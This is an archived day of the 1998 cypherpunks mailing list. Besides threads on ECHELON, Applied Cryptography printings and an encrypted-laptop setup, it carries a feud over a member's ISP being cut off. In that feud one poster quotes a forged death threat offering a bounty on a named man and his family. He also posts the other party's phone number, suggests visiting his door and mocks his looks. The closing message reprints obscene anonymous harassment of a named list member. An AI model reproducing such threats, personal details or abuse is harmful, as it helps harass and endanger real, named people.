From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Elder <melder@descartes.coker.edu>
Date: Tue, 24 Feb 1998 07:05:30 -0800 (PST)
To: "William R. Butler" <wrb@hotmail.com>
Subject: Re: Valentine Suprise
In-Reply-To: <19980224132805.19244.qmail@hotmail.com>
Message-ID: <3.0.5.32.19980224100046.007bf100@descartes.coker.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 05:28 AM 2/24/98 PST, William R. Butler wrote:
>FUCK-OFF!!!!!!!!!!!!!!!!
>************************

...

>Me and my friends are so lonely!! 
>I wish that you would come and see me. 
>With Valentines day coming I don't want to be alone. 
>I will do anything to make you happy, 
>if you want me to I'll even invite a friend over to join us.  
>Just PLEASE don't let me be alone!  
>I'll be awaiting for you every night.
>I'll be at: http://www.cyber-fantasy.com/
>

I think that was the point of the advertisement d=]

-E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 24 Feb 1998 08:15:22 -0800 (PST)
To: Information Security <guy@panix.com>
Subject: Re: Fight ECHELON while the topic is hot!
In-Reply-To: <199802241543.KAA18074@panix2.panix.com>
Message-ID: <199802241648.LAA15368@users.invweb.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3989.1071713780.multipart/signed"

--Boundary..3989.1071713780.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

In <199802241543.KAA18074@panix2.panix.com>, on 02/24/98 
   at 10:43 AM, Information Security <guy@panix.com> said:

>Whooey!

>I'd say a number of senior people on this list are burnt
>out fighting the good fight.

>Did the government at least acknowledge it fucked up
>in the Weaver case to the tune of $3.1 million?

Nope, as a matter of fact the Administration was just arguing before the
SC that the murders in this case should not be held accountable.

>Didn't the person in charge, who Freeh promoted to
>second-in-command at the FBI, have his career destroyed?

One scapegoat and the organization goes on, business as usual. When I see
a 100,000 citizens storm the J.E.Hoover Building and drag that ratbastard
Freeh out by his heals then come back and tell us what a difference you
have made.

>Didn't the government finally back down on their
>attempt to legally kill the Unabomber?

So what? IMHO he should have been fried. Hell I'll even pay for the plane
ticket for him to come down here and meet 'ol sparky. :)

>Didn't the Pentagon Papers make it out?

What did it change? NOTHING

>Isn't ECHELON documented by person after person,
>including someone formerly in DOJ with top-secret
>clearance?

>Go for it!

>It is *you* who are advocating being a "sheeple"!!!

No not at all I just don't have any pie-in-the-sky daydreams that it will
mean squat! I have better things to do with my time than dealing with a
news media who's highest goal is to sell more tampons and toilet paper to
the sheeple.

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
---------------------------------------------------------------
 
Tag-O-Matic: Windws is ine for bckgroun comunicaions


--Boundary..3989.1071713780.multipart/signed
Content-Type: application/octet-stream; name="pgp00004.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00004.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zYS1z
aGExCkNvbW1lbnQ6IFJlZ2lzdGVyZWRfVXNlcl9FLVNlY3VyZV92MS4xYjFf
RVMwMDAwMDAKCmlRQ1ZBd1VBTlBMa1RZOUNvMW4rYUxoaEFRR1k0UVArSW1l
MndDSkhwcG5YMWQ5TTY2MVlmZUpKVzEzcXBrRVoKbGNoVUQ4RGpSbEtBbTgw
VjNPU0NOSWFtSmVZOHRTSERmSTNtQ0l4Qmg1Q2NZVkQ0a1ZkYTVLTEZ3cm1p
Q0h4NgpHREpSUkhIRW9KVHJuRk9HcnhNWWpvTWYvM2ovaTdicjQzUkQ2TnBD
NVlxcVQ5bXc3RnBYMVpUL3duYXhtbUhPCnZMYWNMemVXRWZNPQo9WTg0YQot
LS0tLUVORCBQR1AgTUVTU0FHRS0tLS0t
--Boundary..3989.1071713780.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 24 Feb 1998 07:43:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Fight ECHELON while the topic is hot!
Message-ID: <199802241543.KAA18074@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From: "William H. Geiger III" <whgiii@invweb.net>
   >   Date: Tue, 24 Feb 98 09:16:29 -0500
   >   
   >   >It's high time Don Mclean (sic) or someone took the
   >   >extensive documentation collected in the Cryptography
   >   >Manifesto regarding this, which includes massive USA domestic spying, and
   >   >started writing news stories about it, and
   >   >get other news organizations interested in the questions
   >   >raised. Questions to be put to Senators.
   >   
   >   >Why?
   >   
   >   >Because it is ECHELON, not pedophiles, not drug dealers,
   >   >that is not only the hold-up for freely exportable
   >   >software, but also for why the FBI has openly moved
   >   >to regulate all domestic cryptography into oblivion.
   >   
   >   >The story of massive spying is one "the American people"
   >   >can understand. Cryptography is too distant.
   >   
   >   >Go for it, someone, please.
   >   
   >   The sheeple don't care.
   >   
   >   The sheeple are well aware of the abuses of power by our government and
   >   they don't care nor have they cared for a long time. So long as they have
   >   a roof over their heads, cloths on their back, a color TV and their
   >   microwave dinners they are willing to let the government do whatever they
   >   want.

Whooey!

I'd say a number of senior people on this list are burnt
out fighting the good fight.

Did the government at least acknowledge it fucked up
in the Weaver case to the tune of $3.1 million?

Didn't the person in charge, who Freeh promoted to
second-in-command at the FBI, have his career destroyed?

Didn't the government finally back down on their
attempt to legally kill the Unabomber?

Didn't the Pentagon Papers make it out?

Isn't ECHELON documented by person after person,
including someone formerly in DOJ with top-secret
clearance?

Go for it!

It is *you* who are advocating being a "sheeple"!!!
---guy

   Shame on you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 24 Feb 1998 08:22:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Fight ECHELON while the topic is hot!
Message-ID: <199802241622.LAA21768@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From whgiii@invweb.net Tue Feb 24 11:15:11 1998
   >   
   >   >It is *you* who are advocating being a "sheeple"!!!
   >   
   >   No not at all I just don't have any pie-in-the-sky daydreams that it will
   >   mean squat! I have better things to do with my time than dealing with a
   >   news media who's highest goal is to sell more tampons and toilet paper to
   >   the sheeple.

I said to go for it and *try* for results.

If you want to act like a disgruntled old Andy Rooney and
say "it won't make any difference", fine, but why drag
down everyone else?

The EU, not just anybody, but the EU, is talking
about massive NSA spying via ECHELON!
---guy

   Turn up the heat.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 24 Feb 1998 08:24:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Policeman?
Message-ID: <199802241624.LAA22146@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Guy wrote:
>  Has 'cypherpunks@cyberpass.net' replaced 'cypherpunks@toad.com'?

Apparently it hasn't, because I never got a copy of my own post back.

So, here it is again...


   >   From aba@dcs.ex.ac.uk Mon Feb 23 16:26:58 1998
   >   
   >   Guy <guy@panix.com> claims that he managed to persuade PSInet (who
   >   Dimitri used as his ISP) to pull his plug.

Leaving him with full access to a minimum of three other accounts.

   Don't cry for him, Ukrainia...

   >   I'd just like to feed back to Guy that I think this is uncool, and
   >   that it is counter productive.

Hey, maybe _you_ would get a warm and fuzzy feeling when
Dimitry posts a death threat (including to this list) and
signs your name: not me.

!   I will gladly pay the $50,000 (canadian) reward to whomever KILLS
!   Chris Lewis and his family, who reside in a suburb of Ottawa.
!   I'm putting the notice of the CAUCE reward on http://www.panix.com/~guy
!   ---guy

   >   Guy, you may not have hit it off with Dimitri, but this is no reason
   >   to go attempting to censor people.  Ever heard of a kill file?  

Censor?

Yeah, and the "Freedom Fighters" who are against any spam cancellation
do so because they are fighting "censorship".

I don't think so.

   >   As an aside I don't think getting into a dirty tricks contest with
   >   Dimitri is a good idea, I am pretty sure Dimitri could win by a large
   >   margin if he cared to.

No dirty tricks involved: I complained to PSINet using traffic analysis.

If he had simply called me a cocksucker, I would not have complained.

   >   Guy <guy@panix.com> writes:
   >   > PSINet terminated Vulis for stalking, which I documented he did to a
   >   > minimum of four people.
   >   
   >   What is your working definition of stalking as applied to a mailing
   >   list, USENET or email?  What are you talking about?

In addition to death threats, forging death threats: he tries to get
people fired from their jobs.

But Dimitry can't figure out where I work (MUHAHAHAHAHAHAHA), reducing
him to saying I was fired from where I _used to_ work.

<snicker>

This stalking: attempting to deprive someone of their right to work.


----


   >   From tcmay@got.net Mon Feb 23 17:14:50 1998
   >   
   >   At 1:24 PM -0800 2/23/98, Adam Back wrote:
   >   >Guy <guy@panix.com> claims that he managed to persuade PSInet (who
   >   >Dimitri used as his ISP) to pull his plug.
   >   >
   >   >I'd just like to feed back to Guy that I think this is uncool, and
   >   >that it is counter productive.
   >   >
   >   >Guy, you may not have hit it off with Dimitri, but this is no reason
   >   >to go attempting to censor people.  Ever heard of a kill file?
   >   
   >   I agree with Adam. As one who has borne a frontal assault of Vulis' insults
   >   and raves, and (in all probability his) ASCII artwork, I dealt with it by
   >   filtering as much of it as I could into a trash file.

Oh, great, an independently wealthy person is telling me it's not a problem
that a known stalker has posted angrily to this list asking if anyone knows
where I work.

   >   In my 10 years of actively being on the Net (though my first ARPANet
   >   account was in 1973), I've complained a handful of times to postmasters,
   >   and only _once_ because of content. The rest were about spam, mail bombs,
   >   etc.
   >   
   >   The one content-based complaint I made was about Lawrence Detweiler's
   >   attachment of my name to pro-Hitler, anti-Jewish rants he sent to
   >   newsgroups like alt.culture.jewish and alt.culture.german.

Then please explain why you agree with Adam, since I decided to complain
to PSINet about Vulis stalking me and signing my name to death threats?

   >   If Vulis can have his account yanked for calling Guy a pedophile, what
   >   about all those who have called Arthur C. Clarke a pedophile?
   >   
   >   Has there been any determination (and what does that mean anyway?) as to
   >   whether either Guy or Clarke are pedophiles?

Ahhh, that's the wrong question. Look past your nose.

Calling me a pedophile is one part of Vulis' patented style of stalking
attacks. Add to that him saying I was fired from consulting work for
being a pedophile, asking if anyone knows where I now work, etc: stalking.

It wasn't merely him being insulting, but part of a larger
Simon-Barr-Sinister pattern of behavior.

Certain behavior is not permissible regardless of the venue.

Not a direct analogy, but: you would censor (CENSOR! CENSOR!) people
who work for you who wanted to speak "Ebonics" on the job.

Gosh, how dare you deprive them of their right to free speech!.


----


   >   From aba@dcs.ex.ac.uk Mon Feb 23 21:35:47 1998
   >   
   >   John Young <jya@pipeline.com> writes:
   >   > Since Guy's death notice Dimitri's telephone has not answered
   >   > several tries. The number of his sig: 1-718-261-2013, in Brooklyn
   >   > across floater bay from here.
   >   > 
   >   > Was he whacked as well as unplugged? Or is he hiding from the
   >   > peds, plotting anthrax terror posing as Jim Kallstrom?
   >   
   >   OK, Guy, could you fill us in on what exactly you did to get PSInet to
   >   pull Dimitri's plug?

Exactly what I said: I submitted traffic analysis reports ("the big picture")
regarding Vulis' stalking activity via PSINet to their legal people.

I have previously posted to this list a dejanews URL for an early
traffic analysis report on him that I posted to Usenet.

It was like that, only more complete and specifically oriented towards
getting him spanked.

   >   Did it involve calls to law enforcement?

No.

He used an anonymous remailer for the death threat.

His personal stalking of me didn't get far before I blew him off PSINet.

I'm sure he's learned his lesson. ;-)

He's still here, but sulking silently. He's run out of dirty tricks.

   >   Is it likely that your claims would have been relayed by PSI to law
   >   enforcement?

Oh, I _wish_ I had that kind of influence.

Of course, in the Cryptography Manifesto polemic, I have said not-nice
things about law enforcement, as part of complaining about Key Recovery
and the general Orwellian state of affairs.

Guy's CM: Louis Freeh is a Scary Man with the morals of a styrofoam cup.

On the other hand, I do believe most FBI personnel are good people
who perform an invaluable service for all of us.

Guy's CM: This posting isn't about the many good FBI and other law enforcement people.

Gee, could I do a better job of offending both "sides"? ;-)


   >   If you have taken this far enough to get Dimitri into legal trouble,
   >   and your claims are untrue, or exaggerated, I think you owe it to
   >   Dimitri to try to undo some of this stuff fast!

Hell.

Freeze.

Over.

   >   What did you tell PSInet?

I documented his stalking behavior via PSINet, documented that he
had begun stalking me via PSINet, and stated that if they didn't
terminate him and he continued stalking me, I would sue them.

And that the traffic analysis report they were holding was
what a jury would use to decide PSINet was liable for their
continued (after _years_ of people's complaints) inaction.
---guy

    With Vulis, the best defense is a good offense.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Tue, 24 Feb 1998 08:43:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <95792e88678c7034939f0d6dcc5a10ed@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain


Michael Elder wrote:
> 
> trei@ziplink.net wrote:
> 
> >>Applied Cryptography: Protocols, Algorithms, and Source Code in C,
> >Second Edition, by Bruce Schneier. Copyright  1995, John Wiley & Sons,
> >Inc. All rights reserved.
> >For those wondering: Applied Cryptography includes the source code
> >appendix. I have not checked if it has the 5th printing corrections.
> 
> Just a little note of interest, AC is currently in its sixth printing. I
> just got it last week.
> 
> -E.

I noticed the sixth printing in Barnes and Noble 2 weeks ago. I didn't 
have too long to peruse thru it... Are there any big error corrections/
other reasons to pay any close attention to the new printing?
-Anon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 24 Feb 1998 08:58:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Pentagon Papers
Message-ID: <199802241658.LAA25785@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From William "Grumpy-pie" Geiger III Tue Feb 24 11:46:52 1998
   >   
   >   >Didn't the Pentagon Papers make it out?
   >   
   >   What did it change? NOTHING

My vague understanding of the matter is that
it was an important US Supreme Court case
involving free speech and prior restraint
thereof.

---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Elder <melder@descartes.coker.edu>
Date: Tue, 24 Feb 1998 09:45:12 -0800 (PST)
To: Anonymous <anon@anon.efga.org>
Subject: Re:
In-Reply-To: <95792e88678c7034939f0d6dcc5a10ed@anon.efga.org>
Message-ID: <3.0.2.32.19980224123918.006ad548@descartes.coker.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 11:48 AM 2/24/98 -0500, Anonymous wrote:

>
>I noticed the sixth printing in Barnes and Noble 2 weeks ago. I didn't 
>have too long to peruse thru it... Are there any big error corrections/
>other reasons to pay any close attention to the new printing?
>-Anon

I just got it as of Sunday. I had to special order it because none of the
book stores I went to had it. Not even B & N. So far I haven't had much of
a chance to look through it.

-E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexandre Maret <amaret@infomaniak.ch>
Date: Tue, 24 Feb 1998 05:52:11 -0800 (PST)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: return.C -- performance tracking tool (fwd)
In-Reply-To: <199802240424.WAA21282@manifold.algebra.com>
Message-ID: <34F2CF5D.8276D7FB@infomaniak.ch>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> 
> I have been using this program for a while and decided to share it
> with the other readers. It is written in C++.

this is not a financial mailing list.
and this code is not C++... it just needs a C++ compiler to
compile. real C++ code doesn't use fprintf, scanf, nor strcmp...

$0.02

  alx





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 24 Feb 1998 12:16:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Policeman?
Message-ID: <199802242015.PAA16794@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From aba@dcs.ex.ac.uk Tue Feb 24 14:56:22 1998
   >   
   >   Guy <guy@panix.com> writes:
   >   
   >   > Has 'cypherpunks@cyberpass.net' replaced 'cypherpunks@toad.com'?
   >   
   >   Er, yes, some time ago now.  cypherpunks@toad.com is no longer, and
   >   that mail to it gets through is just that toad.com feeds what it gets
   >   back to cyberpass.net.  The others replacements are algebra.com, and
   >   ssz.com.

Well, toad.com should stop accepting subscription requests.

   >   You said elsewhere in your expose your claim that Dimitri forged posts
   >   as from you that he used a remailer.  So how can you have traffic
   >   analysis showing that it was him, and secondly how do you know it even
   >   was him.

Because he posted under his own name ~"Chris Lewis should die", etc, and it
matches up with the death threat. He is massively on record in his own
name for stalking Chris Lewis, and contacting Chris Lewis at the same
address.

It was good enough for legal counsel.

---guy

   Plus the easily documented job-stalking of various people.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunder <sunder@brainlink.com>
Date: Tue, 24 Feb 1998 12:55:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Q: Information on PhD Cryptography Classes]
Message-ID: <34F332B8.C15DAD56@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain

I got this request sent to me directly.  If you have info for this person
please reply directly to: balakrik@goldey.gbc.edu.

To: SUNDER@brainlink.com
Subject: Information on Cryptography
From: Karthik Balakrishnan <balakrik@goldey.gbc.edu>
Date: Tue, 24 Feb 1998 11:45:26 -0500

To introduce myself, I am Karthik Balakrishnan, a senior majoring in
 Computer Information Systems. I should be graduating at the end of th
 Fall semester.
 I am planning to pursue my Master's in Cryptography, probably try for
 PhD program.
 I would really appretiate your help in guiding me through this proces
 by giving me some advice on this, as to which schools offer a PhD in
 this field, the schools that you recommend, and how to go about this
 process.
 
 My e-mail address is : balakrik@goldey,gbc.edu
 Thank you very much.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 24 Feb 1998 13:29:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Policeman?
Message-ID: <199802242129.QAA24166@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From jya@pipeline.com Tue Feb 24 16:06:28 1998
   >   
   >   Guy,
   >   
   >   Without defending Dimitri's actions I'd like to check that
   >   he's not suffered a Jim Bell snatch, perhaps unrelated
   >   to your complaint.

PSINet snatcheroo?

That's getting tough on complaints. ;-)

I've only submitted a complaint to PSINet so far.

Haven't gotten around to Altopia.

I do actually work for a living, despite Vulis' claims.

He posted from 'cj3@alt.net' _after_ being terminated from PSINet.

   >   He's not answered his phone since
   >   you announced the unplug, nor answered e-mail (to dm.com,
   >   which is no longer active).
   >   
   >   Do you have any info on who I could contact for leads?
   >   Or can you refer this to someone who does? I've only got 
   >   the phone number listed in his sig.

Whois gives his number as:

   Billing Contact:
      Vulis, Dimitri  (DV1010)  dlv@DM.COM
      718-261-6839

   >   BTW, I'm in Manhattan. Vox: 212-873-8700.

Ain't it great here in NYC, Third Planet From the Sun?

You could always go over and knock on his door.

I hear he posted a picture of himself to the Net in 1992,
and that "he looked dorky, and his wife fat".

Hey, Vulis is probably looking for a real job.

Maybe he's finally found one.

I can hear him saying:

   "Would you like fries with that?"

---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 24 Feb 1998 16:00:23 -0800 (PST)
To: whgiii@invweb.net (William H. Geiger III)
Subject: Re: return.C -- performance tracking tool (fwd)
In-Reply-To: <199802241436.JAA14156@users.invweb.net>
Message-ID: <199802242358.RAA29739@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


William H. Geiger III wrote:
>    at 02:47 PM, Alexandre Maret <amaret@infomaniak.ch> said:
> >Igor Chudov @ home wrote:
> >> 
> >> I have been using this program for a while and decided to share it
> >> with the other readers. It is written in C++.
> 
> >this is not a financial mailing list.
> >and this code is not C++... it just needs a C++ compiler to
> >compile. real C++ code doesn't use fprintf, scanf, nor strcmp...

Excuse me, mah friend, it is C++ in its pure form, with classes and all.

> Let's not forget that *real* C++ apps are bloated several time that of
> comparable C apps (god forbid anyone write some tight ASM code).

Not this one. But you have a good point.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 24 Feb 1998 16:04:26 -0800 (PST)
To: amaret@infomaniak.ch (Alexandre Maret)
Subject: Re: return.C -- performance tracking tool (fwd)
In-Reply-To: <34F2CF5D.8276D7FB@infomaniak.ch>
Message-ID: <199802250002.SAA29824@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Alexandre Maret wrote:
> Igor Chudov @ home wrote:
> > I have been using this program for a while and decided to share it
> > with the other readers. It is written in C++.
> 
> this is not a financial mailing list.

This is not a gun mailing list, not a chemical mailing list, not
a flame mailing list, but all of these things are also discussed.

> and this code is not C++... it just needs a C++ compiler to
> compile. real C++ code doesn't use fprintf, scanf, nor strcmp...

It is the purest form of C++. As my grandma used to say, take your eyes
in your hands and take a look.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andrew fabbro <afabbro@umich.edu>
Date: Tue, 24 Feb 1998 20:09:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cryptobook: State of the Art in '98?
Message-ID: <Pine.LNX.3.95.980224224839.14480H-100000@brokenarrow.us.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


I finally got around to building a cryptobook, as Joel McNamara
described at

	http://www.eskimo.com/~joelm/cryptbk.html

Being cool cypherpunk types, you already know that I'm referring to a
computer that has an encrypted partition, is tricked out with cryptoware,
and has been modified to prevent data leakage as much as possible (e.g.,
the OS swaps on the encrypted drive, the fact that it's a cryptobook is
somewhat concealed, etc.)

Joel's excellent article is two years old.  I'm wondering if anyone
can improve upon it, as there is at least one near-showstopper problem.
(FYI, I'm using Win95 as a platform for various reasons, mostly because
the data I'm encrypting is Win95-based and Joels' guide is Intel-based):

(*) SecureDrive is recommended as a hard drive encryption product.
Unfortunately, it's 16-bit and designed for DOS.  On my laptop, which
(as is typical) only has one hard drive controller, in order to mount
the partition in 16-bit mode, I have to turn off all 32-bit disk access,
which slows everything down a great deal, means loading a 16-bit CD-ROM
driver, etc.  Little things like animated icons also don't work -- yes,
who cares, but it suggests there are probably other side effects.

My winGeek friends don't think there is a way to mount one partition
in 16-bit mode and the other in 32-bit mode.  I'm wondering if anyone
knows of 32-bit program like SecureDrive, preferably one using IDEA,
that would be a worthwhile replacement.  (FYI, another package of the
same generation, SecureDevice, has the same problems).

(*) Anyone care to recommend anything that is not included in Joel's list?
Maybe new or better products since '96?  I'd particularly be interested
in some way of automating some of the manual things Joel proposes --
secure deletions, steganography, etc.  Sorry, I'm a UNIX geek and am
somewhat lost in Windows land...

Thanks all,




--
 Andrew Fabbro [afabbro@umich.edu] www-personal.umich.edu/~afabbro 
 "Solutions are not answers to problems." -- Richard Nixon








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 24 Feb 1998 15:55:51 -0800 (PST)
To: guy@panix.com
Subject: Re: Cypherpunk Policeman?
In-Reply-To: <199802242129.QAA24166@panix2.panix.com>
Message-ID: <199802242348.XAA00716@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Guy writes <guy@panix.com>:
> He posted from 'cj3@alt.net' _after_ being terminated from PSINet.

You sure?  I mean it could as easily as not been someone spoofing him,
what with the various anonymous mails, etc., that you reported.

> Hey, Vulis is probably looking for a real job.
> 
> Maybe he's finally found one.

I hear he already had one: he's a lecturer at a University in new york
(not sure of names of NY universitys), unless your actions lead
indirectly to his contract being terminated.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Wed, 25 Feb 1998 05:54:34 -0800 (PST)
To: Peter Trei <trei@ziplink.net>
Subject: Re: DDJ Crypto CD has arrived!
In-Reply-To: <34F252DA.652A@ziplink.net>
Message-ID: <Pine.GSO.3.95.980225002414.23668D-100000@king>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Feb 1998, Peter Trei wrote:

> Well, it's finally here.
> 
Yeah, it surprised the hell out of me to get it so  delyaed from the
order, without any explanation or apology in the packaging... kinda
wierd...

> I've encountered a few minor bugs in the few minutes I've played with
> it; not all of the buttons work properly, and the color maps go to hell
> when the program's window is not selected.

I've noticed that the text appears to be scanned in.  (and ocred).
Ther'ess numerous minor grammatical errors, such as missing commas, a "d"
instead of the ")", and other misc. stuff in the first chapter of Applied
Cryptography...

That's actually more disappointing than the lack of anHTML version of the
books, in my opinion..

Oh well..  Perhaps we can convince them to correct it?

I do notice that the reader tends to make the left edge of the text very
difficult to pick out from the edge of the window.. Ahh... well, , it
obviously suffered some strange problems in manufacture...

Ryan







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 24 Feb 1998 22:30:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Policeman?
Message-ID: <199802250630.BAA03674@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From aba@dcs.ex.ac.uk Tue Feb 24 18:55:45 1998
   >   
   >   Guy writes <guy@panix.com>:
   >   > Hey, Vulis is probably looking for a real job.
   >   >
   >   > Maybe he's finally found one.
   >
   >   I hear he already had one: he's a lecturer at a University in new york
   >   (not sure of names of NY universitys), unless your actions lead
   >   indirectly to his contract being terminated.
 
#  http://math.harvard.edu/~verbit/scs/cranks/from-Shlomo.html
#
#  Q: Who is Dimitri Vulis?
#
#  A: Dimitri is an XSoviet immigrant.
#
#  He harasses people all over the net with the most offensive sorts of messages,
#  and uses dirty tricks to retaliate to the people who do get offended. Among
#  his accomplished feats is a series of articles about cat-eating dogs posted to
#  rec.pets.cats (which caused a wave of complaints and made him lost his CUNY
#  account) ; a series of porno binaries with obscene comments about his
#  opponents posted to math-related newsgroups (he lost another academic account,
#  at fordham.edu, after this scandal);
#  [
#     8/3/97 http://corky.fordham.edu/fclc/faculty.html
#     Dimitri Vulis, Adjunct Instructor in Computer Science. BA, MA, CUNY
#     Dimitri: I haven't been teaching at Fordham for a few years.
#              It's too far and the pay's too low.
#  ]
#  ...and a series of racist articles denigrating all aspects of romanian life
#  and culture which used to haunt the romanian newsgroup for years.


----


   >   From aba@dcs.ex.ac.uk Tue Feb 24 18:55:45 1998
   >   
   >   Guy writes <guy@panix.com>:
   >   > He posted from 'cj3@alt.net' _after_ being terminated from PSINet.
   >   
   >   You sure?  I mean it could as easily as not been someone spoofing him,
   >   what with the various anonymous mails, etc., that you reported.

It is a blatant obviousity.

Traffic analysis simply means convincing one or more people
that it's the same person...
---guy

   Convinced?


#  Subject:      (none)
#  From:         Mix <mixmaster@remail.obscura.com>
#  Date:         1998/02/12
#  Newsgroups:   list.cypherpunks
#  
#  Timothy Mayhem will fuck anything that moves, 
#  but he'd rather be fucking his own mother's dead 
#  body.
#  
#                <<<<
#               o(0-0)o
#            -ooO-(_) Ooo-- Timothy Mayhem
#  
#  Subject:      Archie Plutonium's contributions to science
#  From:         simvlad@bwalk.dm.com (AI Simulation Daemon)
#  Date:         1996/11/28
#  Newsgroups:   alt.sci.physics.plutonium,soc.culture.scientists,alt.flame
#   
#  May the force of 231Pu be with you. Archie Plutonium proves a way to list all
#  solutions to Diophantine equations!
#   
#             <<<<
#            o(0-0)o
#         -ooO-(_) Ooo-- Archie Plutonium



#  Subject:      [ADMINISTRATIVIUM] Firewalls
#  From:         nobody@replay.com (Anonymous)
#  Date:         1998/01/13
#  Newsgroups:   list.cypherpunks
#  
#  Timmy C. Mayonnaise's reheated, refurbished, and regurgitated 
#  cud is completely inappropriate for the mailing lists into which 
#  it is cross-ruminated.
#  
#        ,,,
#   -ooO(o o)Ooo- Timmy C. Mayonnaise
#        (_)
#  
#  Subject:      Ludwig Plutonium's latest contributions to number theory
#  From:         simvlad@bwalk.dm.com (AI Simulation Daemon)
#  Date:         1997/02/02
#  Newsgroups:   alt.sci.physics.plutonium,talk.rumors,misc.invest.options
#   
#  Praise the Lord! Ludwig Plutonium proved that some non-trivial
#  zeroes of the zeta function have real part not equal to 1/2.
#   
#              ,,,
#         -ooO(o o)Ooo- Ludwig Plutonium
#              (_)



#  Subject:      (none)
#  From:         Anonymous <anon@anon.efga.org>
#  Date:         1997/12/19
#  Newsgroups:   list.cypherpunks
#  
#  Timmy C. May will fuck anything that moves, 
#  but he'd rather be fucking his own mother's 
#  dead body.
#  
#       /'''
#       c-OO Timmy C. May
#          \
#         -
#  
#  Subject:      Ludwig Plutonium, our greatest scientist
#  From:         simvlad@bwalk.dm.com (AI Simulation Daemon)
#  Date:         1997/02/20
#  Newsgroups:   alt.sci.physics.plutonium,soc.culture.scientists,sci.physics.accelerators
#   
#  Reposted without permission from clari.plutonium. Ludwig Plutonium
#  demonstrates that (a+b)^n=a^n+b^n for some a, b, and n!
#   
#            /'''
#            c-OO Ludwig Plutonium
#               \
#              -



#  Subject:      Re: Zero-knowledge commit
#  From:         nobody@replay.com (Anonymous)
#  Date:         1998/02/01
#  Newsgroups:   list.cypherpunks
#  
#  
#  Timmy C[unt] May carries a turd in his wallet for identification purposes.
#  
#                    __|     \ /     |__
#        _ o   ___\o    \o    |    o/    o/___  o _  Timmy C[unt] May
#         /\  /)  |     ( \  /o\  / )     |  (\  /\
#     ___|_\______                          _____/_|__
#  
#  
#  Subject:      Expressing America's appreciation for Archimedes Uranium
#  From:         simvlad@bwalk.dm.com (AI Simulation Daemon)
#  Date:         1996/11/01
#  Newsgroups:   alt.sci.physics.plutonium,alt.usenet.kooks,sci.bio.misc
#   
#  We live in interesting times. Archimedes Uranium proved beyond all
